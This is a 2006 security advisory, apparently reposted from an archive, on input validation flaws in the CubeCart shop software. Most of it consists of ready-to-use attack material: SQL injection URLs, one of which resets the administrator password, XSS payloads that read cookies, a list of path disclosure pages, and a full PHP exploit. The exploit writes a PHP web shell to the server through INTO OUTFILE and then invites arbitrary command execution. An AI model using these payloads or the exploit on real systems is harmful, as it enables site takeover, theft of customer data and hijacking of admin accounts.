CubeCart Multiple input Validation vulnerabilities

2006-09-27T00:00:00
ID SECURITYVULNS:DOC:14444
Type securityvulns
Reporter Securityvulns
Modified 2006-09-27T00:00:00

Description

Hello,,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security@soqor.net

Sql injection

admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/* it will reset the password for the administrator --

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*

view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

view_doc.php?view_doc=-1'%20union%20select%201,2/*

admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/ /******/ xss admin/print_order.php?order_id=<script>alert(document.cookie);</script> -- view_order.php?order_id=<script>alert(document.cookie);</script> -- admin/nav.php?site_url="><script>alert(document.cookie);</script><noscript> admin/nav.php?la_search_home=<script>alert(document.cookie);</script> and language variables for this file .. -- admin/image.php?image=<script>alert(document.cookie);</script> -- admin/header.inc.php?site_name=</title><script>alert(document.cookie);</script> admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie);</script> admin/header.inc.php?charset='><script>alert(document.cookie);</script> and all other variables in this file -- footer.inc.php?la_pow_by=<script>alert(document.cookie);</script> -- header.inc.php?site_name=</title><script>alert(document.cookie);</script> and all other variables in the file. -- /*****/

Full path

information.php language.php link_navi.php?cat_id=1 list_docs.php popular_prod.php sale.php check_sum.php spotlight.php cat_navi.php

/*********/

Exploit :-

!/usr/bin/php -q -d short_open_tag=on

<? / / CubeCart Remote sql injection exploit / By : HACKERS PAL / WwW.SoQoR.NeT / / Tested on CubeCart 2.0.X and maybe other versions are injected / print_r(' /*******/ / CubeCart Remote sql injection exploit / / by HACKERS PAL <security@soqor.net> / / site: http://www.soqor.net /'); if ($argc<2) { print_r(' / -- / / Usage: php '.$argv[0].' host / Example: / /* php '.$argv[0].' http://localhost/CubeCart/ /*******/ '); die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5);

$url=$argv[1]; $exploit1="/cat_navi.php"; Function get_page($url) {

              if&#40;function_exists&#40;&quot;file_get_contents&quot;&#41;&#41;
              {

                   $contents = file_get_contents&#40;$url&#41;;

                      }
                      else
                      {
                          $fp=fopen&#40;&quot;$url&quot;,&quot;r&quot;&#41;;
                          while&#40;$line=fread&#40;$fp,1024&#41;&#41;
                          {
                           $contents=$contents.$line;
                          }


                              }
                   return $contents;
     }

 $page = get_page&#40;$url.$exploit1&#41;;

         $pa=explode&#40;&quot;&lt;b&gt;&quot;,$page&#41;;
         $pa=explode&#40;&quot;&lt;/b&gt;&quot;,$pa[2]&#41;;
         $path = str_replace&#40;&quot;cat_navi.php&quot;,&quot;&quot;,$pa[0]&#41;.&quot;soqor.php&quot;;
         $var=&#39;&#92; &#39;;
         $var  = str_replace&#40;&quot; &quot;,&quot;&quot;,$var&#41;;
         $path = str_replace&#40;$var,&quot;/&quot;,$path&#41;;
         $exploit2=&quot;/view_doc.php?view_doc=-1&#39;&#37;20union&#37;20select&#37;20&#39;&lt;?php&#37;20system&#40;&quot;.&#39;$_GET[cmd]&#39;.&quot;&#41;;&#37;20?&gt;&#39;,&#39;WwW.SoQoR.NeT&#39;&#37;20INTO&#37;20OUTFILE&#37;20&#39;$path&#39;&#37;20from&#37;20store_docs/*&quot;;
 $page_now = get_page&#40;$url.$exploit2&#41;;
 if&#40;ereg&#40;&quot;mysql_fetch_array&#40;&#41;&quot;,$page_now&#41;&#41;
 {
      $newurl=$url.&quot;/soqor.php?cmd=id&quot;;
      Echo &quot;&#92;n[+] Go TO &quot;.str_replace&#40;&quot;//&quot;,&quot;/&quot;,$newurl&#41;.&quot;&#92;n[+] Change id to any command you want :&#41;&quot;;
 }
 else
 {
      Echo &quot;&#92;n[-] Exploit Faild&quot;;
 }
 Die&#40;&quot;&#92;n/* Visit us : WwW.SoQoR.NeT                   */&#92;n/**********************************************/&quot;&#41;;

?>

WwW.SoQoR.NeT